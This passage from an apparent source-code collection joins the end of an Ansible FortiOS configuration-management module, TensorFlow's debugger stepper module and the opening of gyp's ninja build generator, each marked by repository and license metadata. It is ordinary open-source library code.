from pyFG.fortios import logger
from pyFG.exceptions import CommandExecutionException, FailedCommit, ForcedCommit
HAS_PYFG=True
except:
HAS_PYFG=False
# some blocks don't support update, so remove them
NOT_UPDATABLE_CONFIG_OBJECTS=[
"vpn certificate local",
]
def main():
argument_spec = dict(
src = dict(type='str', default=None),
filter = dict(type='str', default=""),
)
argument_spec.update(fortios_argument_spec)
required_if = fortios_required_if
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=required_if,
)
result = dict(changed=False)
# fail if pyFG not present
if not HAS_PYFG:
module.fail_json(msg='Could not import the python library pyFG required by this module')
#define device
f = FortiOS( module.params['host'],
username=module.params['username'],
password=module.params['password'],
timeout=module.params['timeout'],
vdom=module.params['vdom'])
#connect
try:
f.open()
except:
module.fail_json(msg='Error connecting device')
#get config
try:
f.load_config(path=module.params['filter'])
result['running_config'] = f.running_config.to_text()
except:
module.fail_json(msg='Error reading running config')
#backup config
if module.params['backup']:
backup(module, f.running_config.to_text())
#update config
if module.params['src'] is not None:
#store config in str
try:
conf_str = open(module.params['src'], 'r').read()
f.load_config(in_candidate=True, config_text=conf_str)
except:
module.fail_json(msg="Can't open configuration file, or configuration invalid")
#get updates lines
change_string = f.compare_config()
#remove not updatable parts
c = FortiConfig()
c.parse_config_output(change_string)
for o in NOT_UPDATABLE_CONFIG_OBJECTS:
c.del_block(o)
change_string = c.to_text()
if change_string != "":
result['change_string'] = change_string
result['changed'] = True
#Commit if not check mode
if module.check_mode is False and change_string != "":
try:
f.commit(change_string)
except CommandExecutionException:
e = get_exception()
module.fail_json(msg="Unable to execute command, check your args, the error was {0}".format(e.message))
except FailedCommit:
e = get_exception()
module.fail_json(msg="Unable to commit, check your args, the error was {0}".format(e.message))
except ForcedCommit:
e = get_exception()
module.fail_json(msg="Failed to force commit, check your args, the error was {0}".format(e.message))
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
ryfeus/lambda-packs | Tensorflow_OpenCV_Nightly/source/tensorflow/python/debug/lib/stepper.py | 61 | 35351 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorFlow Debugger (tfdbg) Stepper Module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import shutil
import tempfile
import time
import six
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import ops
from tensorflow.python.ops import session_ops
# TODO(cais): Use nest.flatten once it handles nest Dicts correctly.
def _flatten_fetches(fetches):
"""Flatten list, tuple of fetches, or a single fetch into a list of fetches.
Args:
fetches: The fetches to flatten: Can be a single Tensor, Op, or a
potentially nested list, tuple or dict of such individual fetches.
Returns:
The fetches flattened to a list.
"""
flattened = []
if isinstance(fetches, (list, tuple)):
for fetch in fetches:
flattened.extend(_flatten_fetches(fetch))
elif isinstance(fetches, dict):
for key in fetches:
flattened.extend(_flatten_fetches(fetches[key]))
else:
flattened.append(fetches)
return flattened
class NodeStepper(object):
"""TensorFlow Debugger (tfdbg) stepper.
The stepper provides ability to perform "continue to" actions on a graph,
given fetch and feeds. The stepper calculates the transitive closure of the
fetch. cont() (continue to) calls can only be performed on members of the
transitive closure.
On a cont() call, the stepper performs depth-first tracing of the input
tree of the target. When it reaches an input where one of the following is
available, it will supply the available value to the feed_dict of the cont()
call:
(1) Overriding (injected) values from the client.
(2) TensorHandles from previous cont() calls.
(3) Dumped intermediate Tensors from previous cont() calls.
(4) Feeds supplied during the construction of the stepper instance.
During the cont() call, intermediate Tensors are dumped to temporary
directories. The dumped Tensor values will be used in subsequent cont() calls
when they are required as data dependencies.
The temporary directories are automatically clean when the NodeStepper
instance exits as a context mananger.
Once the tracing is complete, it will issue a run() call on the
underlying session, using the aforementioned feed_dict prepared by the input
tracing, to achieve the "continue-to" action. The above process takes into
account whether the transitive closure of an input contains Variables that
are updated during previous cont() calls on this stepper instance. If such
updates exist, we say the transitive closure is "dirty" and the stepper
can restore the "clean" state of the Variable and avoid using the
TensorHandle.
Example of basic usage:
a = tf.Variable(1.0, name="a")
b = tf.Variable(2.0, anme="b")
c = tf.add(a, b, name="c")
d = tf.multiply(a, c, name="d")
sess = tf.Session()
sess.run(tf.initialize_all_varialbes())
stepper = NodeStepper(sess, d)
stepper.cont(c) # Caches the handle to Tensor c:0.
stepper.cont(d) # Uses handle to Tensor c:0, avoiding recomputing c.
"""
# Possible types of feed used during cont() calls.
FEED_TYPE_CLIENT = "client"
FEED_TYPE_HANDLE = "handle"
FEED_TYPE_OVERRIDE = "override"
FEED_TYPE_DUMPED_INTERMEDIATE = "dumped_intermediate"
def __init__(self, sess, fetches, feed_dict=None):
"""Constructor for Debugger.
Args:
sess: (Session) the TensorFlow Session to step in.
fetches: Same as the fetches input argument to `Session.run()`.
feed_dict: Same as the feed_dict input argument to `Session.run()`.
"""
self._sess = sess
self._fetches = fetches
flattened_fetches = _flatten_fetches(fetches)
self._fetch_names, self._fetch_list = self._get_fetch_and_name_lists(
flattened_fetches)
# A map from Variable name to initializer op.
self._variable_initializers = {}
# A map from Variable name to initial value, used when overriding or
# restoring Variable values.
self._variable_initial_values = {}
# Initialize the map for output recipients (targets).
self._output_targets = {}
# Sorted transitive closure of the fetched node.
# We also collect the list of the names of the reference-type Tensors,
# because we later need to avoid using intermediate dumps for such Tensors.
(self._sorted_nodes,
self._closure_elements,
self._ref_tensor_names) = self._dfs_visit(self._sess.graph,
self._fetch_list)
self._transitive_closure_set = set(self._sorted_nodes)
# A map from Variable name to the old values (before any cont() calls).
self._cached_variable_values = {}
# A cache map from tensor name to what variables may invalidate the tensor
self._cached_invalidation_path = {}
# Keep track of which variables are in a dirty state.
self._dirty_variables = set()
# Variables updated in the last cont() call.
self._last_updated = None
# Cached tensor handles: a dict with keys as tensor names and values as
# tensor handles.
self._tensor_handles = {}
# Cached intermediate tensor values: a dict mapping tensor names to
# DebugTensorDatum.
self._dumped_intermediate_tensors = {}
self._dump_session_root = tempfile.mkdtemp(prefix="tfdbg_stepper_")
# Feed dict from the client.
self._client_feed_dict = {}
if feed_dict:
for key in feed_dict:
if isinstance(key, ops.Tensor):
self._client_feed_dict[key.name] = feed_dict[key]
else:
self._client_feed_dict[key] = feed_dict[key]
# Overriding tensor values.
self._override_tensors = {}
# What the feed types were used by the last cont() call.
self._last_feed_types = {}
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if os.path.isdir(self._dump_session_root):
shutil.rmtree(self._dump_session_root)
def _get_fetch_and_name_lists(self, flattened_fetches):
"""Get the lists of fetches and their names.
Args:
flattened_fetches: A list of fetches or their names. Can mix fetches and
names.
Returns:
(list of str): A list of the names of the fetches.
(list): A list of the fetches.
"""
fetch_names = []
fetch_list = []
for fetch in flattened_fetches:
if isinstance(fetch, six.string_types):
fetch_names.append(fetch)
fetch_list.append(self._sess.graph.as_graph_element(fetch))
else:
fetch_names.append(fetch.name)
fetch_list.append(fetch)
return fetch_names, fetch_list
def _dfs_visit(self, graph, elem_list):
"""Trace back the input of a graph element, using depth-first search.
Uses non-recursive implementation to prevent stack overflow for deep
graphs.
Also performs the following action(s):
1) When encountering a Variable, obtain its initializer op, to
facilitate possible subsequent restoration / overriding of variable
value.
Args:
graph: A TF graph instance.
elem_list: list of graph elements: a Tensor or an Operation.
Returns:
(list of str) A topologically-sorted list of all nodes (not tensors)
in the transitive closure of elem_list. Obviously, the topological sort
is not unique in general. The return value here is just an arbitrary
one of potentially many possible topological sorts.
(list of str) A list of all graph elements (nodes and/or tensors) in the
transitive closure.
"""
# These set should hold only strings, i.e, names of the nodes.
done = set() # Keep track of visited graph elements.
# A list of str: Names of the topologically-sorted graph elements.
node_inputs = dict() # New: Input map of nodes in the transitive closure.
elem_stack = copy.copy(elem_list)
# Graph elements in the transitive closure, including the nodes and tensors.
closure_elements = [elem.name for elem in elem_list]
ref_tensor_names = set()
for element in elem_list:
if isinstance(element, ops.Tensor) and element.dtype._is_ref_dtype: # pylint: disable=protected-access
ref_tensor_names.add(element.name)
while elem_stack:
curr_elem = elem_stack.pop()
curr_node = self._get_node(curr_elem)
done.add(curr_node.name)
non_control_inputs = [inp for inp in curr_node.inputs]
control_inputs = [inp for inp in curr_node.control_inputs]
all_inputs = set(non_control_inputs + control_inputs)
if curr_node.name not in node_inputs:
all_input_nodes = set()
for inp in all_inputs:
all_input_nodes.add(self._get_node(inp).name)
node_inputs[curr_node.name] = all_input_nodes
# Iterate through the (non-control) inputs.
for inp in all_inputs:
# Set up the non-control output map.
# if is_non_control_input:
if inp.name not in self._output_targets:
self._output_targets[inp.name] = set([curr_elem.name])
else:
self._output_targets[inp.name].add(curr_elem.name)
if (isinstance(inp, ops.Tensor) and
inp.op.type in ["Variable", "VariableV2"] and
inp.name not in self._variable_initializers):
# Obtain the initializer op of the variable, in case the Variable's
# value needs to be restored later.
initializer = graph.as_graph_element(inp.op.name + "/Assign")
self._variable_initializers[inp.name] = initializer
self._variable_initial_values[inp.name] = initializer.inputs[1]
inp_node = self._get_node(inp)
if inp_node.name in done:
# Already visited.
continue
elem_stack.append(inp)
closure_elements.append(inp.name)
if isinstance(inp, ops.Tensor) and inp.dtype._is_ref_dtype: # pylint: disable=protected-access
ref_tensor_names.add(inp.name)
# Now that we have traversed the transitive closure and obtained the
# node-input map, we can topologically sort them.
sorted_nodes = []
stack = []
for node in node_inputs:
if not node_inputs[node]:
stack.append(node)
for node in stack:
del node_inputs[node]
while stack:
curr_node = stack.pop()
sorted_nodes.append(curr_node)
# Iterate through the node-input map and remove the child.
pushes = []
for node in node_inputs:
if curr_node in node_inputs[node]:
node_inputs[node].remove(curr_node)
if not node_inputs[node]:
pushes.append(node)
# Delete new pushes from node-input map.
for node in pushes:
del node_inputs[node]
stack.extend(pushes)
return sorted_nodes, closure_elements, ref_tensor_names
def sorted_nodes(self):
"""Get a topologically-sorted list of node names of the stepper.
These are the names of the nodes (i.e., not Tensors) in the transitive
closure of the stepper, in a topologically-sorted order.
Returns:
(list of str): Sorted transitive inputs to the fetch of the stepper
instance. The fetch itself is included in the list.
"""
return self._sorted_nodes
def closure_elements(self):
"""Get a name list of the graph elements of the stepper.
Returns:
(list of str): names of the graph elements (i.e., nodes and tensors) in
the transitive closure of the stepper, in a random order.
"""
return self._closure_elements
def output_slots_in_closure(self, node_name):
"""Get the output tensors in the transitive closure from node.
Args:
node_name: (str) Name of the node in question.
Returns:
(list of int) Output slots of the output tensors of the node that are in
the transitive closure of the stepper.
"""
node = self._sess.graph.as_graph_element(node_name)
tensor_slots = []
for i, _ in enumerate(node.outputs):
tensor_name = node_name + ":%d" % i
if tensor_name in self._closure_elements:
tensor_slots.append(i)
return tensor_slots
def is_feedable(self, name):
"""Determine if a graph element if feedable.
Args:
name: (str) name of the graph element (Tensor or Operation)
Returns:
(bool) whether the graph element is feedable.
"""
if not isinstance(name, six.string_types):
raise TypeError("Expected type str; got type %s" % type(name))
elem = self._sess.graph.as_graph_element(name)
return self._sess.graph.is_feedable(elem)
def override_tensor(self, tensor_name, overriding_val):
"""Override the value of a tensor.
Args:
tensor_name: (str) Name of the tensor to override.
overriding_val: (numpy.ndarray) Overriding tensor value.
Raises:
ValueError: If tensor_name does not correspond to a tensor in the input
tree to the fetched graph element of this stepper instance.
"""
if not isinstance(tensor_name, six.string_types):
raise TypeError("Expected type str; got type %s" % type(tensor_name))
node_name = self._get_node_name(tensor_name)
if node_name not in self._transitive_closure_set:
raise ValueError(
"Cannot override tensor \"%s\" because it does not exist in the "
"input tree to the fetch \"%s\"" %
(tensor_name, repr(self._fetch_names)))
self._override_tensors[tensor_name] = overriding_val
# Invalidate cache by tracing outputs.
self._invalidate_transitively_outgoing_cache(tensor_name)
def remove_override(self, tensor_name):
"""Remove the overriding value on a tensor.
Args:
tensor_name: (str) name of the tensor to remove the overriding value
from.
Raises:
ValueError: If no overriding value exists for tensor_name.
"""
if tensor_name not in self._override_tensors:
raise ValueError("No overriding value exists for tensor \"%s\"." %
tensor_name)
del self._override_tensors[tensor_name]
# Invalidate cache by tracing outputs.
self._invalidate_transitively_outgoing_cache(tensor_name)
def last_feed_types(self):
"""Obtain information about the feed in the last cont() call.
Returns:
(dict) A dict mapping tensor names to feed types.
"""
return self._last_feed_types
def cont(self,
target,
use_tensor_handles=True,
use_dumped_intermediates=True,
use_overrides=True,
invalidate_from_updated_variables=False,
restore_variable_values=False):
"""Continue till the completion of the specified target tensor.
Args:
target: A single fetched Tensor or Op, or a name (str) representing the
Tensor or Op. In the case of a name str, the graph will be searched
to find the corresponding Tensor or Op.
# TODO(cais): Support multiple fetches as in Session.run() interface.
use_tensor_handles: (bool) Whether this cont() run will use cached tensor
handles to avoid recomputation. Default: True.
use_dumped_intermediates: (bool) Whether this cont() call will use dumped
intermediate tensors to avoid recomputation.
use_overrides: (bool) Whether the overriding tensor values supplied by
the client are to be used in this cont() call. Default: True.
invalidate_from_updated_variables: (bool) Whether to invalidate the
tensor handles and intermediate tensor handles affected by the
Variable updates that happen in this cont() call.
restore_variable_values: (bool) Whether the old values of the variables
(before any cont() calls in this object) are to be restored.
Returns:
Value from Session.run() of the target.
Raises:
ValueError: If the target is specified as a string and the string does
not correspond to any tensors in the Session graph.
Or if the target of this cont() is not in the input list of the Stepper
object's target.
Or if target is a Placeholder.
"""
self._last_feed_types = {}
if isinstance(target, six.string_types):
# Fetch target is a string. Assume it is the name of the Tensor or Op and
# will attempt to find it in the Session's graph.
target_name = target
else:
target_name = target.name
graph_element = self._sess.graph.as_graph_element(target_name)
# Any additional tensor handles to obtain in this cont() action.
additional_handle_requests = []
if (isinstance(graph_element, ops.Tensor) and
graph_element.op.type == "Placeholder"):
self._last_feed_types[graph_element.name] = self.FEED_TYPE_CLIENT
return self._client_feed_dict[graph_element.name]
elif (isinstance(graph_element, ops.Operation) and
graph_element.type == "Placeholder"):
tensor_name = graph_element.name + ":0"
self._last_feed_types[tensor_name] = self.FEED_TYPE_CLIENT
return self._client_feed_dict[tensor_name]
if isinstance(graph_element, ops.Operation) and graph_element.outputs:
# Check if this op has any output tensors that also fall into this
# stepper's transitive closure.
node_outputs = [
output.name for output in graph_element.outputs
if output.name in self._closure_elements
]
if node_outputs:
# The target is an op with at least one output within the transitive
# closure. The cont() action will amount to using the 0-th
# output Tensor as the target, as well as obtaining handles to it
# and to the rest of the outputs tensors in the transitive closure
# (if any).
target_name = node_outputs[0]
additional_handle_requests = node_outputs[1:]
# Verify that the target is in the transitive closure of the stepper's
# fetch.
target_node_name = self._get_node_name(target_name)
if target_node_name not in self._transitive_closure_set:
raise ValueError(
"Target \"%s\" is not in the transitive closure for the fetch of the "
"stepper: \"%s\"." % (target_name, repr(self._fetch_names)))
# Check if a cached tensor handle can be used on the fetch directly.
if use_tensor_handles and target_name in self._tensor_handles:
self._last_feed_types[target_name] = self.FEED_TYPE_HANDLE
return self._tensor_handles[target_name].eval()
# Check if a dumped intermediate tensor can be used on the fetch directly.
if (use_dumped_intermediates and
target_name in self._dumped_intermediate_tensors):
self._last_feed_types[target_name] = self.FEED_TYPE_DUMPED_INTERMEDIATE
return self._dumped_intermediate_tensors[target_name].get_tensor()
# Check if an overriding tensor value can be used directly.
if use_overrides and target_name in self._override_tensors:
# Override is available. Return the value right away.
self._last_feed_types[target_name] = self.FEED_TYPE_OVERRIDE
return self._override_tensors[target_name]
# Keep track of which variables are restored in this cont() call.
restored_variables = set()
# Keep track of which variables are "touched" (i.e., possibly updated) in
# this cont() call.
self._last_updated = set()
# =========================================================================
# Use a non-recursive method to trace the inputs from the node and set up
# the feeds.
feeds = {} # The feeds to be used in the Session.run() call.
fetched = self._sess.graph.as_graph_element(target_name)
elem_stack = [fetched]
done = set()
while elem_stack:
curr_elem = elem_stack.pop()
curr_node = self._get_node(curr_elem)
done.add(curr_node.name)
non_control_inputs = [inp for inp in curr_node.inputs]
control_inputs = [inp for inp in curr_node.control_inputs]
all_inputs = set(non_control_inputs + control_inputs)
# Iterate through the (non-control) inputs.
for inp in all_inputs:
# Determine whether the input is feedable. Reference-type tensors,
# e.g., Variables, should not be fed, because they can change.
if isinstance(inp, ops.Tensor):
is_inp_ref = inp.dtype._is_ref_dtype # pylint: disable=protected-access
can_feed = self._sess.graph.is_feedable(inp) and not is_inp_ref
else:
is_inp_ref = False
can_feed = False
if (restore_variable_values and inp.name in self._dirty_variables and
inp.name not in restored_variables and
inp.name not in self._last_updated):
# Do not restore Variables touched or restored previously in this
# cont() call.
initializer_op = self._variable_initializers[inp.name]
initial_value_tensor = self._variable_initial_values[inp.name]
self._sess.run(initializer_op,
feed_dict={
initial_value_tensor:
self._cached_variable_values[inp.name]
})
# Mark the variable as restored.
restored_variables.add(inp.name)
# Determine if this is a reference-type input from a variable, and
# the recipient node is not Identity. In that case, the Variable
# needs to be marked as dirty and its current value recorded, due to
# the fact that the receiving op may mutate the value of the Variable.
if (is_inp_ref and inp.op.type in ["Variable", "VariableV2"] and
curr_node.type != "Identity"):
# Mark the variable as dirty.
self._last_updated.add(inp.name)
# Obtain the old value of the variable and cache it.
if inp.name not in self._cached_variable_values:
old_value = self._sess.run(inp)
self._cached_variable_values[inp.name] = old_value
# N.B.: The order of the logical branches matters. For example,
# _client_feed_dict comes after _tensor_handles, so that tensor
# handles stored in cont() calls can override the original client
# feeds. Also for example, _override_tensors comes the first, so
# the manual overriding, if exists, can always take effect.
if use_overrides and can_feed and inp.name in self._override_tensors:
# Use client-supplied overriding tensor value.
feeds[inp] = self._override_tensors[inp.name]
self._last_feed_types[inp.name] = self.FEED_TYPE_OVERRIDE
elif (can_feed and inp not in feeds and
use_tensor_handles and inp.name in self._tensor_handles):
# Tensor handle found in cache.
feeds[inp] = self._tensor_handles[inp.name]
self._last_feed_types[inp.name] = self.FEED_TYPE_HANDLE
elif (can_feed and inp not in feeds and
use_dumped_intermediates and
inp.name in self._dumped_intermediate_tensors):
# Dumped intermediate Tensor found.
feeds[inp] = self._dumped_intermediate_tensors[inp.name].get_tensor()
self._last_feed_types[inp.name] = self.FEED_TYPE_DUMPED_INTERMEDIATE
elif inp.name in self._client_feed_dict:
# This input is available in the client feed_dict.
feeds[inp] = self._client_feed_dict[inp.name]
self._last_feed_types[inp.name] = self.FEED_TYPE_CLIENT
else:
# There is no feed available for this input. So keep tracing its
# input(s).
inp_node = self._get_node(inp)
if inp_node.name in done:
# Already visited.
continue
elem_stack.append(inp)
done.add(inp_node.name)
# =========================================================================
if self._last_updated:
self._dirty_variables.update(self._last_updated)
for variable in restored_variables:
self._dirty_variables.remove(variable)
(dump_path,
run_options) = self._prepare_cont_call_dump_path_and_run_options()
if isinstance(fetched, ops.Operation):
# The fetched is an Operation: Will not get tensor handle.
self._sess.run(fetched, feed_dict=feeds, options=run_options)
return_value = None
else:
# This is a Tensor: Will get tensor handle and cache it.
# Will also get the additional requested tensor handles (if any).
tensors_to_get_handles_for = [fetched]
handle_names = [target_name]
tensors_to_get_handles_for.extend([
self._sess.graph.as_graph_element(h)
for h in additional_handle_requests
])
handle_names.extend(additional_handle_requests)
handles = self._sess.run(
[session_ops.get_session_handle(tensor) for tensor in
tensors_to_get_handles_for],
feed_dict=feeds,
options=run_options)
for handle_name, handle in zip(handle_names, handles):
self._tensor_handles[handle_name] = handle
return_value = self._tensor_handles[target_name].eval()
self._load_dumped_intermediate_tensors(dump_path, target_name)
if invalidate_from_updated_variables:
# Invalidate caches at the end.
for last_updated_variable in self._last_updated:
self._invalidate_transitively_outgoing_cache(last_updated_variable)
return return_value
def _prepare_cont_call_dump_path_and_run_options(self):
"""Prepare the dump path and RunOptions for next cont() call.
Returns:
dump_path: (str) Directory path to which the intermediate tensor will be
dumped.
run_options: (config_pb2.RunOptions) The RunOptions containing the tensor
watch options for this graph.
"""
run_options = config_pb2.RunOptions()
dump_path = self._cont_call_dump_path()
for element_name in self._closure_elements:
if ":" in element_name:
debug_utils.add_debug_tensor_watch(
run_options,
debug_data.get_node_name(element_name),
output_slot=debug_data.get_output_slot(element_name),
debug_urls=["file://" + dump_path])
return dump_path, run_options
def _cont_call_dump_path(self):
return os.path.join(self._dump_session_root,
"cont_%d" % int(time.time() * 1e6))
def _load_dumped_intermediate_tensors(self, dump_path, target_name):
dump_dir = debug_data.DebugDumpDir(dump_path, validate=False)
for dump in dump_dir.dumped_tensor_data:
if (dump.tensor_name not in self._ref_tensor_names and
dump.tensor_name not in self._tensor_handles and
dump.tensor_name not in self._override_tensors and
dump.tensor_name != target_name):
self._dumped_intermediate_tensors[dump.tensor_name] = dump
def _get_node_name(self, graph_element_name):
return graph_element_name.split(":")[0]
def _invalidate_transitively_outgoing_cache(self, source_element):
"""Invalidate the cached tensor handles by tracing output.
This method is used to invalidate caches such as cached TensorHandles
and intermediate tensor values when Variable mutation happens or when
client overrides tensor values.
Uses non-recursive implementation to avoid stack overflow on deep networks.
Args:
source_element: The source graph element (e.g., a Variable output slot)
to trace the output from.
"""
if not self._tensor_handles and not self._dumped_intermediate_tensors:
return
# First, use cached invalidation paths to eliminate some cached tensor
# handles and intermediate tensors.
to_delete_handles = []
for handle_name in self._tensor_handles:
if (handle_name in self._cached_invalidation_path and
source_element in self._cached_invalidation_path[handle_name]):
to_delete_handles.append(handle_name)
for handle_name in to_delete_handles:
del self._tensor_handles[handle_name]
to_delete_intermediates = []
for intm_tensor_name in self._dumped_intermediate_tensors:
if (intm_tensor_name in self._cached_invalidation_path and
source_element in self._cached_invalidation_path[intm_tensor_name]):
to_delete_intermediates.append(intm_tensor_name)
for intermediate in to_delete_intermediates:
del self._dumped_intermediate_tensors[intermediate]
if not self._tensor_handles and not self._dumped_intermediate_tensors:
return
stack = [source_element]
done = set()
while stack:
curr_element = stack.pop()
done.add(curr_element)
if (curr_element in self._tensor_handles or
curr_element in self._dumped_intermediate_tensors):
# Cache the invalidation path for potential future use.
if curr_element not in self._cached_invalidation_path:
self._cached_invalidation_path[curr_element] = set([source_element])
else:
self._cached_invalidation_path[curr_element].add(source_element)
if curr_element in self._tensor_handles:
del self._tensor_handles[curr_element]
else:
del self._dumped_intermediate_tensors[curr_element]
targets = self._output_targets.get(curr_element, [])
for target in targets:
if target in done:
continue
else:
stack.append(target)
def finalize(self):
"""Run the final fetch(es).
Restore the dirty variables; ignore the client-supplied overriding tensor
values.
Returns:
The same return value as self.cont() as called on the final fetch.
"""
self.restore_variable_values()
return self._sess.run(self._fetches, feed_dict=self._client_feed_dict)
def restore_variable_values(self):
"""Restore variables to the initial values.
"Initial value" refers to the value when this NodeStepper instance was
first constructed.
"""
for var_name in self._dirty_variables:
self._sess.run(self._variable_initializers[var_name],
feed_dict={
self._variable_initial_values[var_name]:
self._cached_variable_values[var_name]
})
def handle_names(self):
"""Return names of the TensorHandles that the debugger is holding.
Returns:
(list of str) Name of the tensors for which TensorHandle is available.
"""
return [name for name in self._tensor_handles]
def handle_node_names(self):
"""Get list of names of the nodes for which handles are available.
Returns:
(set of str) List of names of the nodes.
"""
return set([self._get_node_name(name) for name in self._tensor_handles])
def intermediate_tensor_names(self):
"""Get list of the names of the Tensors for which dumps are available.
Returns:
(list of str) List of the names of the Tensors for which intermediate
dumps are available.
"""
return self._dumped_intermediate_tensors.keys()
def last_updated(self):
"""Get the names of the variables updated in the last cont() call.
Returns:
A set of the variable names updated in the previous cont() call.
If no cont() call has occurred before, returns None.
"""
return self._last_updated
def dirty_variables(self):
"""Get the set of variables that are currently "dirty".
"dirty" means:
previous cont() calls have updated the value of the Variable,
and the Variable's old value (the value before any cont() calls
happened) was not restored.
Returns:
(set) A set of dirty variables.
"""
return self._dirty_variables
def is_placeholder(self, graph_element_name):
"""Check whether a graph element is a Placeholder, by name.
Args:
graph_element_name: (str) Name of the tensor or op to be tested.
Returns:
(bool) Whether the graph element of the specified name is a Placeholder
op or the output Tensor of a Placeholder op.
Raises:
ValueError: If graph_element_name is not in the transitive closure of the
stepper instance.
"""
node_name = self._get_node_name(graph_element_name)
if node_name not in self.sorted_nodes():
raise ValueError(
"%s is not in the transitive closure of this NodeStepper "
"instance" % graph_element_name)
graph_element = self._sess.graph.as_graph_element(graph_element_name)
if not isinstance(graph_element, ops.Operation):
graph_element = graph_element.op
return graph_element.type == "Placeholder"
def placeholders(self):
"""Get the list of Placeholder Tensors in the transitive closure.
Returns:
(list of str) A list of Placeholder Tensors or ops in the transitive
closure.
"""
placeholders = []
for item in self.sorted_nodes():
if self.is_placeholder(item):
placeholders.append(item)
return placeholders
def get_tensor_value(self, tensor_name):
"""Get the value of a tensor that the stepper has access to.
Args:
tensor_name: (str) Name of the tensor.
Returns:
Value of the tensor, from overriding values or cached tensor handles.
Raises:
ValueError: If the value is not available as an overriding value
or through a TensorHandle.
"""
if self.is_placeholder(tensor_name):
if ":" not in tensor_name:
tensor_name += ":0"
return self._client_feed_dict[tensor_name]
elif tensor_name in self._override_tensors:
return self._override_tensors[tensor_name]
elif tensor_name in self._tensor_handles:
return self._tensor_handles[tensor_name].eval()
elif tensor_name in self._dumped_intermediate_tensors:
return self._dumped_intermediate_tensors[tensor_name].get_tensor()
else:
raise ValueError(
"This stepper instance does not have access to the value of "
"tensor \"%s\"" % tensor_name)
def override_names(self):
"""Return names of the TensorHandles that the debugger is holding.
Returns:
(list of str) Name of the tensor for which overriding tensor values are
available.
"""
return [name for name in self._override_tensors]
def _get_node(self, element):
"""Get the node of a graph element.
Args:
element: A graph element (Op, Tensor or Node)
Returns:
The node associated with element in the graph.
"""
node_name, _ = debug_data.parse_node_or_tensor_name(element.name)
return self._sess.graph.as_graph_element(node_name)
| mit |
maxence-diblasi/www.tropeesdeleau.fr | node_modules/node-sass/node_modules/node-gyp/gyp/pylib/gyp/generator/ninja.py | 45 | 99890 | # Copyright (c) 2013 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import copy
import hashlib
import json
import multiprocessing
import os.path
import re
import signal
import subprocess
import sys
import gyp
import gyp.common
from gyp.common import OrderedSet
import gyp.msvs_emulation
import gyp.MSVSUtil as MSVSUtil
import gyp.xcode_emulation
from cStringIO import StringIO
from gyp.common import GetEnvironFallback
import gyp.ninja_syntax as ninja_syntax
generator_default_variables = {
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'SHARED_LIB_PREFIX': 'lib',
# Gyp expects the following variables to be expandable by the build
# system to the appropriate locations. Ninja prefers paths to be
# known at gyp time. To resolve this, introduce special
# variables starting with $! and $| (which begin with a $ so gyp knows it
# should be treated specially, but is otherwise an invalid
# ninja/shell variable) that are passed to gyp here but expanded
# before writing out into the target .ninja files; see
# ExpandSpecial.
# $! is used for variables that represent a path and that can only appear at
# the start of a string, while $| is used for variables that can appear
# anywhere in a string.
'INTERMEDIATE_DIR': '$!INTERMEDIATE_DIR',
'SHARED_INTERMEDIATE_DIR': '$!PRODUCT_DIR/gen',
'PRODUCT_DIR': '$!PRODUCT_DIR',
'CONFIGURATION_NAME': '$|CONFIGURATION_NAME',
# Special variables that may be used by gyp 'rule' targets.
# We generate definitions for these variables on the fly when processing a
# rule.
'RULE_INPUT_ROOT': '${root}',
'RULE_INPUT_DIRNAME': '${dirname}',
'RULE_INPUT_PATH': '${source}',
'RULE_INPUT_EXT': '${ext}',
'RULE_INPUT_NAME': '${name}',
}
# Placates pylint.
generator_additional_non_configuration_keys = []
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
generator_filelist_paths = None
generator_supports_multiple_toolsets = gyp.common.CrossCompileRequested()
def StripPrefix(arg, prefix):
if arg.startswith(prefix):
return arg[len(prefix):]
return arg
def QuoteShellArgument(arg, flavor):
"""Quote a string such that it will be interpreted as a single argument
by the shell."""
# Rather than attempting to enumerate the bad shell characters, just
# whitelist common OK ones and quote anything else.
if re.match(r'^[a-zA-Z0-9_=.\\/-]+$', arg):
return arg # No quoting necessary.
if flavor == 'win':
return gyp.msvs_emulation.QuoteForRspFile(arg)
return "'" + arg.replace("'", "'" + '"\'"' + "'") + "'"
def Define(d, flavor):
"""Takes a preprocessor define and returns a -D parameter that's ninja- and
shell-escaped."""
if flavor == 'win':
# cl.exe replaces literal # characters with = in preprocesor definitions for
# some reason. Octal-encode to work around that.
d = d.replace('#', '\\%03o' % ord('#'))
return QuoteShellArgument(ninja_syntax.escape('-D' + d), flavor)
def AddArch(output, arch):
"""Adds an arch string to an output path."""
output, extension = os.path.splitext(output)
return '%s.%s%s' % (output, arch, extension)
class Target(object):
"""Target represents the paths used within a single gyp target.
Conceptually, building a single target A is a series of steps:
1) actions/rules/copies generates source/resources/etc.
2) compiles generates .o files
3) link generates a binary (library/executable)
4) bundle merges the above in a mac bundle
(Any of these steps can be optional.)
From a build ordering perspective, a dependent target B could just
depend on the last output of this series of steps.
But some dependent commands sometimes need to reach inside the box.
For example, when linking B it needs to get the path to the static
library generated by A.
This object stores those paths. To keep things simple, member
variables only store concrete paths to single files, while methods
compute derived values like "the last output of the target".
"""
def __init__(self, type):
# Gyp type ("static_library", etc.) of this target.
self.type = type
# File representing whether any input dependencies necessary for
# dependent actions have completed.
self.preaction_stamp = None
# File representing whether any input dependencies necessary for
# dependent compiles have completed.
self.precompile_stamp = None
# File representing the completion of actions/rules/copies, if any.
